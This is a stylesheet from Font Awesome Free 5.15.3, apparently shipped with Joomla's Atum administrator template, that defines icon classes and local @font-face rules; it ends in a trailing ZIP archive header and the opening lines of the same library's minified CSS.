.fa-step-forward:before {
  content: "";
}

.fa-stethoscope:before {
  content: "";
}

.fa-sticker-mule:before {
  content: "";
}

.fa-sticky-note:before {
  content: "";
}

.fa-stop:before {
  content: "";
}

.fa-stop-circle:before {
  content: "";
}

.fa-stopwatch:before {
  content: "";
}

.fa-stopwatch-20:before {
  content: "";
}

.fa-store:before {
  content: "";
}

.fa-store-alt:before {
  content: "";
}

.fa-store-alt-slash:before {
  content: "";
}

.fa-store-slash:before {
  content: "";
}

.fa-strava:before {
  content: "";
}

.fa-stream:before {
  content: "";
}

.fa-street-view:before {
  content: "";
}

.fa-strikethrough:before {
  content: "";
}

.fa-stripe:before {
  content: "";
}

.fa-stripe-s:before {
  content: "";
}

.fa-stroopwafel:before {
  content: "";
}

.fa-studiovinari:before {
  content: "";
}

.fa-stumbleupon:before {
  content: "";
}

.fa-stumbleupon-circle:before {
  content: "";
}

.fa-subscript:before {
  content: "";
}

.fa-subway:before {
  content: "";
}

.fa-suitcase:before {
  content: "";
}

.fa-suitcase-rolling:before {
  content: "";
}

.fa-sun:before {
  content: "";
}

.fa-superpowers:before {
  content: "";
}

.fa-superscript:before {
  content: "";
}

.fa-supple:before {
  content: "";
}

.fa-surprise:before {
  content: "";
}

.fa-suse:before {
  content: "";
}

.fa-swatchbook:before {
  content: "";
}

.fa-swift:before {
  content: "";
}

.fa-swimmer:before {
  content: "";
}

.fa-swimming-pool:before {
  content: "";
}

.fa-symfony:before {
  content: "";
}

.fa-synagogue:before {
  content: "";
}

.fa-sync:before {
  content: "";
}

.fa-sync-alt:before {
  content: "";
}

.fa-syringe:before {
  content: "";
}

.fa-table:before {
  content: "";
}

.fa-table-tennis:before {
  content: "";
}

.fa-tablet:before {
  content: "";
}

.fa-tablet-alt:before {
  content: "";
}

.fa-tablets:before {
  content: "";
}

.fa-tachometer-alt:before {
  content: "";
}

.fa-tag:before {
  content: "";
}

.fa-tags:before {
  content: "";
}

.fa-tape:before {
  content: "";
}

.fa-tasks:before {
  content: "";
}

.fa-taxi:before {
  content: "";
}

.fa-teamspeak:before {
  content: "";
}

.fa-teeth:before {
  content: "";
}

.fa-teeth-open:before {
  content: "";
}

.fa-telegram:before {
  content: "";
}

.fa-telegram-plane:before {
  content: "";
}

.fa-temperature-high:before {
  content: "";
}

.fa-temperature-low:before {
  content: "";
}

.fa-tencent-weibo:before {
  content: "";
}

.fa-tenge:before {
  content: "";
}

.fa-terminal:before {
  content: "";
}

.fa-text-height:before {
  content: "";
}

.fa-text-width:before {
  content: "";
}

.fa-th:before {
  content: "";
}

.fa-th-large:before {
  content: "";
}

.fa-th-list:before {
  content: "";
}

.fa-the-red-yeti:before {
  content: "";
}

.fa-theater-masks:before {
  content: "";
}

.fa-themeco:before {
  content: "";
}

.fa-themeisle:before {
  content: "";
}

.fa-thermometer:before {
  content: "";
}

.fa-thermometer-empty:before {
  content: "";
}

.fa-thermometer-full:before {
  content: "";
}

.fa-thermometer-half:before {
  content: "";
}

.fa-thermometer-quarter:before {
  content: "";
}

.fa-thermometer-three-quarters:before {
  content: "";
}

.fa-think-peaks:before {
  content: "";
}

.fa-thumbs-down:before {
  content: "";
}

.fa-thumbs-up:before {
  content: "";
}

.fa-thumbtack:before {
  content: "";
}

.fa-ticket-alt:before {
  content: "";
}

.fa-tiktok:before {
  content: "";
}

.fa-times:before {
  content: "";
}

.fa-times-circle:before {
  content: "";
}

.fa-tint:before {
  content: "";
}

.fa-tint-slash:before {
  content: "";
}

.fa-tired:before {
  content: "";
}

.fa-toggle-off:before {
  content: "";
}

.fa-toggle-on:before {
  content: "";
}

.fa-toilet:before {
  content: "";
}

.fa-toilet-paper:before {
  content: "";
}

.fa-toilet-paper-slash:before {
  content: "";
}

.fa-toolbox:before {
  content: "";
}

.fa-tools:before {
  content: "";
}

.fa-tooth:before {
  content: "";
}

.fa-torah:before {
  content: "";
}

.fa-torii-gate:before {
  content: "";
}

.fa-tractor:before {
  content: "";
}

.fa-trade-federation:before {
  content: "";
}

.fa-trademark:before {
  content: "";
}

.fa-traffic-light:before {
  content: "";
}

.fa-trailer:before {
  content: "";
}

.fa-train:before {
  content: "";
}

.fa-tram:before {
  content: "";
}

.fa-transgender:before {
  content: "";
}

.fa-transgender-alt:before {
  content: "";
}

.fa-trash:before {
  content: "";
}

.fa-trash-alt:before {
  content: "";
}

.fa-trash-restore:before {
  content: "";
}

.fa-trash-restore-alt:before {
  content: "";
}

.fa-tree:before {
  content: "";
}

.fa-trello:before {
  content: "";
}

.fa-tripadvisor:before {
  content: "";
}

.fa-trophy:before {
  content: "";
}

.fa-truck:before {
  content: "";
}

.fa-truck-loading:before {
  content: "";
}

.fa-truck-monster:before {
  content: "";
}

.fa-truck-moving:before {
  content: "";
}

.fa-truck-pickup:before {
  content: "";
}

.fa-tshirt:before {
  content: "";
}

.fa-tty:before {
  content: "";
}

.fa-tumblr:before {
  content: "";
}

.fa-tumblr-square:before {
  content: "";
}

.fa-tv:before {
  content: "";
}

.fa-twitch:before {
  content: "";
}

.fa-twitter:before {
  content: "";
}

.fa-twitter-square:before {
  content: "";
}

.fa-typo3:before {
  content: "";
}

.fa-uber:before {
  content: "";
}

.fa-ubuntu:before {
  content: "";
}

.fa-uikit:before {
  content: "";
}

.fa-umbraco:before {
  content: "";
}

.fa-umbrella:before {
  content: "";
}

.fa-umbrella-beach:before {
  content: "";
}

.fa-uncharted:before {
  content: "";
}

.fa-underline:before {
  content: "";
}

.fa-undo:before {
  content: "";
}

.fa-undo-alt:before {
  content: "";
}

.fa-uniregistry:before {
  content: "";
}

.fa-unity:before {
  content: "";
}

.fa-universal-access:before {
  content: "";
}

.fa-university:before {
  content: "";
}

.fa-unlink:before {
  content: "";
}

.fa-unlock:before {
  content: "";
}

.fa-unlock-alt:before {
  content: "";
}

.fa-unsplash:before {
  content: "";
}

.fa-untappd:before {
  content: "";
}

.fa-upload:before {
  content: "";
}

.fa-ups:before {
  content: "";
}

.fa-usb:before {
  content: "";
}

.fa-user:before {
  content: "";
}

.fa-user-alt:before {
  content: "";
}

.fa-user-alt-slash:before {
  content: "";
}

.fa-user-astronaut:before {
  content: "";
}

.fa-user-check:before {
  content: "";
}

.fa-user-circle:before {
  content: "";
}

.fa-user-clock:before {
  content: "";
}

.fa-user-cog:before {
  content: "";
}

.fa-user-edit:before {
  content: "";
}

.fa-user-friends:before {
  content: "";
}

.fa-user-graduate:before {
  content: "";
}

.fa-user-injured:before {
  content: "";
}

.fa-user-lock:before {
  content: "";
}

.fa-user-md:before {
  content: "";
}

.fa-user-minus:before {
  content: "";
}

.fa-user-ninja:before {
  content: "";
}

.fa-user-nurse:before {
  content: "";
}

.fa-user-plus:before {
  content: "";
}

.fa-user-secret:before {
  content: "";
}

.fa-user-shield:before {
  content: "";
}

.fa-user-slash:before {
  content: "";
}

.fa-user-tag:before {
  content: "";
}

.fa-user-tie:before {
  content: "";
}

.fa-user-times:before {
  content: "";
}

.fa-users:before {
  content: "";
}

.fa-users-cog:before {
  content: "";
}

.fa-users-slash:before {
  content: "";
}

.fa-usps:before {
  content: "";
}

.fa-ussunnah:before {
  content: "";
}

.fa-utensil-spoon:before {
  content: "";
}

.fa-utensils:before {
  content: "";
}

.fa-vaadin:before {
  content: "";
}

.fa-vector-square:before {
  content: "";
}

.fa-venus:before {
  content: "";
}

.fa-venus-double:before {
  content: "";
}

.fa-venus-mars:before {
  content: "";
}

.fa-vest:before {
  content: "";
}

.fa-vest-patches:before {
  content: "";
}

.fa-viacoin:before {
  content: "";
}

.fa-viadeo:before {
  content: "";
}

.fa-viadeo-square:before {
  content: "";
}

.fa-vial:before {
  content: "";
}

.fa-vials:before {
  content: "";
}

.fa-viber:before {
  content: "";
}

.fa-video:before {
  content: "";
}

.fa-video-slash:before {
  content: "";
}

.fa-vihara:before {
  content: "";
}

.fa-vimeo:before {
  content: "";
}

.fa-vimeo-square:before {
  content: "";
}

.fa-vimeo-v:before {
  content: "";
}

.fa-vine:before {
  content: "";
}

.fa-virus:before {
  content: "";
}

.fa-virus-slash:before {
  content: "";
}

.fa-viruses:before {
  content: "";
}

.fa-vk:before {
  content: "";
}

.fa-vnv:before {
  content: "";
}

.fa-voicemail:before {
  content: "";
}

.fa-volleyball-ball:before {
  content: "";
}

.fa-volume-down:before {
  content: "";
}

.fa-volume-mute:before {
  content: "";
}

.fa-volume-off:before {
  content: "";
}

.fa-volume-up:before {
  content: "";
}

.fa-vote-yea:before {
  content: "";
}

.fa-vr-cardboard:before {
  content: "";
}

.fa-vuejs:before {
  content: "";
}

.fa-walking:before {
  content: "";
}

.fa-wallet:before {
  content: "";
}

.fa-warehouse:before {
  content: "";
}

.fa-watchman-monitoring:before {
  content: "";
}

.fa-water:before {
  content: "";
}

.fa-wave-square:before {
  content: "";
}

.fa-waze:before {
  content: "";
}

.fa-weebly:before {
  content: "";
}

.fa-weibo:before {
  content: "";
}

.fa-weight:before {
  content: "";
}

.fa-weight-hanging:before {
  content: "";
}

.fa-weixin:before {
  content: "";
}

.fa-whatsapp:before {
  content: "";
}

.fa-whatsapp-square:before {
  content: "";
}

.fa-wheelchair:before {
  content: "";
}

.fa-whmcs:before {
  content: "";
}

.fa-wifi:before {
  content: "";
}

.fa-wikipedia-w:before {
  content: "";
}

.fa-wind:before {
  content: "";
}

.fa-window-close:before {
  content: "";
}

.fa-window-maximize:before {
  content: "";
}

.fa-window-minimize:before {
  content: "";
}

.fa-window-restore:before {
  content: "";
}

.fa-windows:before {
  content: "";
}

.fa-wine-bottle:before {
  content: "";
}

.fa-wine-glass:before {
  content: "";
}

.fa-wine-glass-alt:before {
  content: "";
}

.fa-wix:before {
  content: "";
}

.fa-wizards-of-the-coast:before {
  content: "";
}

.fa-wodu:before {
  content: "";
}

.fa-wolf-pack-battalion:before {
  content: "";
}

.fa-won-sign:before {
  content: "";
}

.fa-wordpress:before {
  content: "";
}

.fa-wordpress-simple:before {
  content: "";
}

.fa-wpbeginner:before {
  content: "";
}

.fa-wpexplorer:before {
  content: "";
}

.fa-wpforms:before {
  content: "";
}

.fa-wpressr:before {
  content: "";
}

.fa-wrench:before {
  content: "";
}

.fa-x-ray:before {
  content: "";
}

.fa-xbox:before {
  content: "";
}

.fa-xing:before {
  content: "";
}

.fa-xing-square:before {
  content: "";
}

.fa-y-combinator:before {
  content: "";
}

.fa-yahoo:before {
  content: "";
}

.fa-yammer:before {
  content: "";
}

.fa-yandex:before {
  content: "";
}

.fa-yandex-international:before {
  content: "";
}

.fa-yarn:before {
  content: "";
}

.fa-yelp:before {
  content: "";
}

.fa-yen-sign:before {
  content: "";
}

.fa-yin-yang:before {
  content: "";
}

.fa-yoast:before {
  content: "";
}

.fa-youtube:before {
  content: "";
}

.fa-youtube-square:before {
  content: "";
}

.fa-zhihu:before {
  content: "";
}

.sr-only {
  border: 0;
  clip: rect(0, 0, 0, 0);
  height: 1px;
  margin: -1px;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
}

.sr-only-focusable:active, .sr-only-focusable:focus {
  clip: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  position: static;
  width: auto;
}

/*!
 * Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com
 * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License)
 */
@font-face {
  font-family: "Font Awesome 5 Free";
  font-style: normal;
  font-weight: 400;
  font-display: block;
  src: url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-regular-400.eot");
  src: url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-regular-400.eot?#iefix") format("embedded-opentype"), url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-regular-400.woff2") format("woff2"), url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-regular-400.woff") format("woff"), url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-regular-400.ttf") format("truetype"), url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-regular-400.svg#fontawesome") format("svg");
}
.far {
  font-family: "Font Awesome 5 Free";
  font-weight: 400;
}

/*!
 * Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com
 * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License)
 */
@font-face {
  font-family: "Font Awesome 5 Free";
  font-style: normal;
  font-weight: 900;
  font-display: block;
  src: url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-solid-900.eot");
  src: url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-solid-900.eot?#iefix") format("embedded-opentype"), url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-solid-900.woff2") format("woff2"), url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-solid-900.woff") format("woff"), url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-solid-900.ttf") format("truetype"), url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-solid-900.svg#fontawesome") format("svg");
}
.fa,
.fas,
[class^=icon-],
[class*=" icon-"] {
  font-family: "Font Awesome 5 Free";
  font-weight: 900;
}

/*!
 * Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com
 * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License)
 */
@font-face {
  font-family: "Font Awesome 5 Brands";
  font-style: normal;
  font-weight: 400;
  font-display: block;
  src: url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-brands-400.eot");
  src: url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-brands-400.eot?#iefix") format("embedded-opentype"), url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-brands-400.woff2") format("woff2"), url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-brands-400.woff") format("woff"), url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-brands-400.ttf") format("truetype"), url("../../../../../../media/vendor/fontawesome-free/webfonts/fa-brands-400.svg#fontawesome") format("svg");
}
.fab, .icon-joomla {
  font-family: "Font Awesome 5 Brands";
  font-weight: 400;
}

/**
 *  IcoMoon to Fontawesome Conversion
 */
[class^=icon-],
[class*=" icon-"] {
  speak: none;
}

[class^=icon-].disabled,
[class*=" icon-"].disabled,
[class^=fa-].disabled,
[class*=" fa-"].disabled {
  font-weight: 400;
}

.icon-joomla:before {
  content: "";
}

.icon-accessible:before {
  content: "";
}

.icon-add:before {
  content: "";
}

.icon-address-book:before {
  content: "";
}

.icon-address:before {
  content: "";
}

.icon-align-justify:before {
  content: "";
}

.icon-angle-double-left:before {
  content: "";
}

.icon-angle-double-right:before {
  content: "";
}

.icon-angle-down:before {
  content: "";
}

.icon-angle-left:before {
  content: "";
}

.icon-angle-right:before {
  content: "";
}

.icon-angle-up:before {
  content: "";
}

.icon-apply:before {
  content: "";
}

.icon-archive:before {
  content: "";
}

.icon-arrow-down-2:before {
  content: "";
}

.icon-arrow-down-3:before {
  content: "";
}

.icon-arrow-down-4:before {
  content: "";
}

.icon-arrow-down:before {
  content: "";
}

.icon-arrow-first:before {
  content: "";
}

.icon-arrow-last:before {
  content: "";
}

.icon-arrow-left-2:before {
  content: "";
}

.icon-arrow-left-3:before {
  content: "";
}

.icon-arrow-left-4:before {
  content: "";
}

.icon-arrow-left:before {
  content: "";
}

.icon-arrow-right-2:before {
  content: "";
}

.icon-arrow-right-3:before {
  content: "";
}

.icon-arrow-right-4:before {
  content: "";
}

.icon-arrow-right:before {
  content: "";
}

.icon-arrow-up-2:before {
  content: "";
}

.icon-arrow-up-3:before {
  content: "";
}

.icon-arrow-up-4:before {
  content: "";
}

.icon-arrow-up:before {
  content: "";
}

.icon-arrows-alt:before {
  content: "";
}

.icon-asterisk:before {
  content: "";
}

.icon-attachment:before {
  content: "";
}

.icon-backward-2:before {
  content: "";
}

.icon-backward-circle:before {
  content: "";
}

.icon-backward:before {
  content: "";
}

.icon-ban-circle:before {
  content: "";
}

.icon-bars:before {
  content: "";
}

.icon-basket:before {
  content: "";
}

.icon-bell:before {
  content: "";
}

.icon-bolt:before {
  content: "";
}

.icon-book:before {
  content: "";
}

.icon-bookmark-2:before {
  content: "";
}

.icon-bookmark:before {
  content: "";
}

.icon-box-add:before {
  content: "";
}

.icon-box-remove:before {
  content: "";
}

.icon-briefcase:before {
  content: "";
}

.icon-broadcast:before {
  content: "";
}

.icon-brush:before {
  content: "";
}

.icon-bubble-quote:before {
  content: "";
}

.icon-bullhorn:before {
  content: "";
}

.icon-calendar-check:before {
  content: "";
}

.icon-calendar-2:before {
  content: "";
}

.icon-calendar-3:before {
  content: "";
}

.icon-calendar-alt:before {
  content: "";
}

.icon-calendar:before {
  content: "";
}

.icon-camera-2:before {
  content: "";
}

.icon-camera:before {
  content: "";
}

.icon-cancel-2:before {
  content: "";
}

.icon-cancel-circle:before {
  content: "";
}

.icon-cancel:before {
  content: "";
}

.icon-caret-down:before {
  content: "";
}

.icon-caret-up:before {
  content: "";
}

.icon-cart:before {
  content: "";
}

.icon-chart:before {
  content: "";
}

.icon-check-circle:before {
  content: "";
}

.icon-check-square:before {
  content: "";
}

.icon-check:before {
  content: "";
}

.icon-checkbox-checked:before {
  content: "";
}

.icon-checkbox-partial:before {
  content: "";
}

.icon-checkbox-unchecked:before {
  content: "";
}

.icon-checkbox:before {
  content: "";
}

.icon-checkedout:before {
  content: "";
}

.icon-checkin:before {
  content: "";
}

.icon-checkmark-2:before {
  content: "";
}

.icon-checkmark-circle:before {
  content: "";
}

.icon-checkmark:before {
  content: "";
}

.icon-chevron-down:before {
  content: "";
}

.icon-chevron-left:before {
  content: "";
}

.icon-chevron-right:before {
  content: "";
}

.icon-chevron-up:before {
  content: "";
}

.icon-circle:before {
  content: "";
}

.icon-clipboard:before {
  content: "";
}

.icon-clock:before {
  content: "";
}

.icon-cloud-download-alt:before {
  content: "";
}

.icon-cloud-download:before {
  content: "";
}

.icon-cloud-upload:before {
  content: "";
}

.icon-cloud:before {
  content: "";
}

.icon-code:before {
  content: "";
}

.icon-code-branch:before {
  content: "";
}

.icon-cog:before {
  content: "";
}

.icon-cogs:before {
  content: "";
}

.icon-collapse:before {
  content: "";
}

.icon-color-palette:before {
  content: "";
}

.icon-comment-dots:before {
  content: "";
}

.icon-comment:before {
  content: "";
}

.icon-comments-2:before {
  content: "";
}

.icon-comments:before {
  content: "";
}

.icon-compass:before {
  content: "";
}

.icon-connection:before {
  content: "";
}

.icon-contract-2:before {
  content: "";
}

.icon-contract:before {
  content: "";
}

.icon-copy:before {
  content: "";
}

.icon-credit-2:before {
  content: "";
}

.icon-credit:before {
  content: "";
}

.icon-crop:before {
  content: "";
}

.icon-cube:before {
  content: "";
}

.icon-cubes:before {
  content: "";
}

.icon-dashboard:before {
  content: "";
}

.icon-database:before {
  content: "";
}

.icon-default:before {
  content: "";
}

.icon-delete:before {
  content: "";
}

.icon-desktop:before {
  content: "";
}

.icon-downarrow:before {
  content: "";
}

.icon-download:before {
  content: "";
}

.icon-drawer-2:before {
  content: "";
}

.icon-drawer:before {
  content: "";
}

.icon-edit:before {
  content: "";
}

.icon-ellipsis-h:before {
  content: "";
}

.icon-ellipsis-v:before {
  content: "";
}

.icon-enter:before {
  content: "";
}

.icon-envelope-open-text:before {
  content: "";
}

.icon-envelope-opened:before {
  content: "";
}

.icon-envelope:before {
  content: "";
}

.icon-equalizer:before {
  content: "";
}

.icon-error:before {
  content: "";
}

.icon-exclamation-circle:before {
  content: "";
}

.icon-exclamation-triangle:before {
  content: "";
}

.icon-exclamation:before {
  content: "";
}

.icon-exit:before {
  content: "";
}

.icon-expand-2:before {
  content: "";
}

.icon-expand:before {
  content: "";
}

.icon-expired:before {
  content: "";
}

.icon-external-link-alt:before {
  content: "";
}

.icon-eye-2:before {
  content: "";
}

.icon-eye-blocked:before {
  content: "";
}

.icon-eye-close:before {
  content: "";
}

.icon-eye-open:before {
  content: "";
}

.icon-eye-slash:before {
  content: "";
}

.icon-eye:before {
  content: "";
}

.icon-fax:before {
  content: "";
}

.icon-featured:before {
  content: "";
}

.icon-feed:before {
  content: "";
}

.icon-file-2:before {
  content: "";
}

.icon-file-add:before {
  content: "";
}

.icon-file-alt:before {
  content: "";
}

.icon-file-check:before {
  content: "";
}

.icon-file-minus:before {
  content: "";
}

.icon-file-plus:before {
  content: "";
}

.icon-file-remove:before {
  content: "";
}

.icon-file:before {
  content: "";
}

.icon-filter:before {
  content: "";
}

.icon-first:before {
  content: "";
}

.icon-flag-2:before {
  content: "";
}

.icon-flag-3:before {
  content: "";
}

.icon-flag:before {
  content: "";
}

.icon-flash:before {
  content: "";
}

.icon-folder-2:before {
  content: "";
}

.icon-folder-3:before {
  content: "";
}

.icon-folder-close:before {
  content: "";
}

.icon-folder-minus:before {
  content: "";
}

.icon-folder-open:before {
  content: "";
}

.icon-folder-plus-2:before {
  content: "";
}

.icon-folder-plus:before {
  content: "";
}

.icon-folder-remove:before {
  content: "";
}

.icon-folder:before {
  content: "";
}

.icon-forward-2:before {
  content: "";
}

.icon-forward-circle:before {
  content: "";
}

.icon-forward:before {
  content: "";
}

.icon-generic:before {
  content: "";
}

.icon-globe:before {
  content: "";
}

.icon-grid-2:before {
  content: "";
}

.icon-grid-view-2:before {
  content: "";
}

.icon-grid-view:before {
  content: "";
}

.icon-grid:before {
  content: "";
}

.icon-handshake:before {
  content: "";
}

.icon-health:before {
  content: "";
}

.icon-heart-2:before {
  content: "";
}

.icon-heart:before {
  content: "";
}

.icon-help:before {
  content: "";
}

.icon-hits:before {
  content: "";
}

.icon-home-2:before {
  content: "";
}

.icon-home:before {
  content: "";
}

.icon-image:before {
  content: "";
}

.icon-images:before {
  content: "";
}

.icon-info-2:before {
  content: "";
}

.icon-info-circle:before {
  content: "";
}

.icon-info:before {
  content: "";
}

.icon-key:before {
  content: "";
}

.icon-lamp:before {
  content: "";
}

.icon-language:before {
  content: "";
}

.icon-last:before {
  content: "";
}

.icon-leftarrow:before {
  content: "";
}

.icon-lightbulb:before {
  content: "";
}

.icon-lightning:before {
  content: "";
}

.icon-link:before {
  content: "";
}

.icon-list-2:before {
  content: "";
}

.icon-list-view:before {
  content: "";
}

.icon-list:before {
  content: "";
}

.icon-loading:before {
  content: "";
}

.icon-location:before {
  content: "";
}

.icon-lock:before {
  content: "";
}

.icon-locked:before {
  content: "";
}

.icon-loop:before {
  content: "";
}

.icon-mail-2:before {
  content: "";
}

.icon-mail:before {
  content: "";
}

.icon-map-signs:before {
  content: "";
}

.icon-menu-2:before {
  content: "";
}

.icon-menu-3:before {
  content: "";
}

.icon-menu:before {
  content: "";
}

.icon-minus-2:before {
  content: "";
}

.icon-minus-circle:before {
  content: "";
}

.icon-minus-sign:before {
  content: "";
}

.icon-minus:before {
  content: "";
}

.icon-mobile:before {
  content: "";
}

.icon-move:before {
  content: "";
}

.icon-music:before {
  content: "";
}

.icon-new-tab-2:before {
  content: "";
}

.icon-new-tab:before {
  content: "";
}

.icon-new:before {
  content: "";
}

.icon-next:before {
  content: "";
}

.icon-not-ok:before {
  content: "";
}

.icon-notification-2:before {
  content: "";
}

.icon-notification-circle:before {
  content: "";
}

.icon-notification:before {
  content: "";
}

.icon-ok:before {
  content: "";
}

.icon-open:before {
  content: "";
}

.icon-options:before {
  content: "";
}

.icon-out-2:before {
  content: "";
}

.icon-out-3:before {
  content: "";
}

.icon-out:before {
  content: "";
}

.icon-paint-brush:before {
  content: "";
}

.icon-palette:before {
  content: "";
}

.icon-paperclip:before {
  content: "";
}

.icon-paragraph-center:before {
  content: "";
}

.icon-paragraph-justify:before {
  content: "";
}

.icon-paragraph-left:before {
  content: "";
}

.icon-paragraph-right:before {
  content: "";
}

.icon-pause-circle:before {
  content: "";
}

.icon-pause:before {
  content: "";
}

.icon-pen-square:before {
  content: "";
}

.icon-pencil-2:before {
  content: "";
}

.icon-pencil-alt:before {
  content: "";
}

.icon-pencil:before {
  content: "";
}

.icon-pending:before {
  content: "";
}

.icon-phone-2:before {
  content: "";
}

.icon-phone:before {
  content: "";
}

.icon-picture:before {
  content: "";
}

.icon-pictures:before {
  content: "";
}

.icon-pie:before {
  content: "";
}

.icon-pin:before {
  content: "";
}

.icon-play-2:before {
  content: "";
}

.icon-play-circle:before {
  content: "";
}

.icon-play:before {
  content: "";
}

.icon-plug:before {
  content: "";
}

.icon-plus-2:before {
  content: "";
}

.icon-plus-circle:before {
  content: "";
}

.icon-plus-square:before {
  content: "";
}

.icon-plus:before {
  content: "";
}

.icon-power-cord:before {
  content: "";
}

.icon-power-off:before {
  content: "";
}

.icon-previous:before {
  content: "";
}

.icon-print:before {
  content: "";
}

.icon-printer:before {
  content: "";
}

.icon-project-diagram:before {
  content: "";
}

.icon-protected:before {
  content: "";
}

.icon-publish:before {
  content: "";
}

.icon-purge:before {
  content: "";
}

.icon-pushpin:before {
  content: "";
}

.icon-puzzle-piece:before {
  content: "";
}

.icon-puzzle:before {
  content: "";
}

.icon-question-2:before {
  content: "";
}

.icon-question-circle:before {
  content: "";
}

.icon-question-sign:before {
  content: "";
}

.icon-question:before {
  content: "";
}

.icon-quote-2:before {
  content: "";
}

.icon-quote-3:before {
  content: "";
}

.icon-quote:before {
  content: "";
}

.icon-quotes-left:before {
  content: "";
}

.icon-quotes-right:before {
  content: "";
}

.icon-radio-checked:before {
  content: "";
}

.icon-radio-unchecked:before {
  content: "";
}

.icon-redo-2:before {
  content: "";
}

.icon-redo:before {
  content: "";
}

.icon-refresh:before {
  content: "";
}

.icon-register:before {
  content: "";
}

.icon-remove:before {
  content: "";
}

.icon-reply:before {
  content: "";
}

.icon-rightarrow:before {
  content: "";
}

.icon-rss:before {
  content: "";
}

.icon-save-copy:before {
  content: "";
}

.icon-save-new:before {
  content: "";
}

.icon-save:before {
  content: "";
}

.icon-scissors:before {
  content: "";
}

.icon-screen:before {
  content: "";
}

.icon-screwdriver:before {
  content: "";
}

.icon-search-minus:before {
  content: "";
}

.icon-search-plus:before {
  content: "";
}

.icon-search:before {
  content: "";
}

.icon-select-file:before {
  content: "";
}

.icon-share-alt:before {
  content: "";
}

.icon-share:before {
  content: "";
}

.icon-shield-alt:before {
  content: "";
}

.icon-shield:before {
  content: "";
}

.icon-shuffle:before {
  content: "";
}

.icon-signup:before {
  content: "";
}

.icon-sliders-h:before {
  content: "";
}

.icon-smiley-2:before {
  content: "";
}

.icon-smiley-happy-2:before {
  content: "";
}

.icon-smiley-happy:before {
  content: "";
}

.icon-smiley-neutral-2:before {
  content: "";
}

.icon-smiley-neutral:before {
  content: "";
}

.icon-smiley-sad-2:before {
  content: "";
}

.icon-smiley-sad:before {
  content: "";
}

.icon-smiley:before {
  content: "";
}

.icon-sort:before {
  content: "";
}

.icon-spinner:before {
  content: "";
}

.icon-square:before {
  content: "";
}

.icon-stack:before {
  content: "";
}

.icon-star-2:before {
  content: "";
}

.icon-star-empty:before {
  content: "";
}

.icon-star:before {
  content: "";
}

.icon-stop-circle:before {
  content: "";
}

.icon-stop:before {
  content: "";
}

.icon-success:before {
  content: "";
}

.icon-support:before {
  content: "";
}

.icon-switch:before {
  content: "";
}

.icon-sync:before {
  content: "";
}

.icon-tablet:before {
  content: "";
}

.icon-tachometer-alt:before {
  content: "";
}

.icon-tag-2:before {
  content: "";
}

.icon-tag:before {
  content: "";
}

.icon-tags-2:before {
  content: "";
}

.icon-tags:before {
  content: "";
}

.icon-tasks:before {
  content: "";
}

.icon-text-width:before {
  content: "";
}

.icon-th:before {
  content: "";
}

.icon-th-large:before {
  content: "";
}

.icon-thumbs-down:before {
  content: "";
}

.icon-thumbs-up:before {
  content: "";
}

.icon-times:before {
  content: "";
}

.icon-toggle-off:before {
  content: "";
}

.icon-toggle-on:before {
  content: "";
}

.icon-tools:before {
  content: "";
}

.icon-trash:before {
  content: "";
}

.icon-tree-2:before {
  content: "";
}

.icon-tree:before {
  content: "";
}

.icon-trophy:before {
  content: "";
}

.icon-unarchive:before {
  content: "";
}

.icon-unblock:before {
  content: "";
}

.icon-undo-2:before {
  content: "";
}

.icon-undo:before {
  content: "";
}

.icon-unfeatured:before {
  content: "";
}

.icon-universal:before {
  content: "";
}

.icon-universal-access:before {
  content: "";
}

.icon-unlock-alt:before {
  content: "";
}

.icon-unlock:before {
  content: "";
}

.icon-unpublish:before {
  content: "";
}

.icon-uparrow:before {
  content: "";
}

.icon-upload:before {
  content: "";
}

.icon-user-circle:before {
  content: "";
}

.icon-user-edit:before {
  content: "";
}

.icon-user-lock:before {
  content: "";
}

.icon-user-tag:before {
  content: "";
}

.icon-user:before {
  content: "";
}

.icon-users-cog:before {
  content: "";
}

.icon-users:before {
  content: "";
}

.icon-vcard:before {
  content: "";
}

.icon-video-2:before {
  content: "";
}

.icon-video:before {
  content: "";
}

.icon-wand:before {
  content: "";
}

.icon-warning-2:before {
  content: "";
}

.icon-warning-circle:before {
  content: "";
}

.icon-warning:before {
  content: "";
}

.icon-wifi:before {
  content: "";
}

.icon-wrench:before {
  content: "";
}

.icon-zoom-in:before {
  content: "";
}

.icon-zoom-out:before {
  content: "";
}

html[dir=rtl] .float-right {
  float: left;
}PK!�� �tt4atum/css/vendor/fontawesome-free/fontawesome.min.cssnu&1i�@charset "UTF-8";
/*!
 * Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com
 * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License)
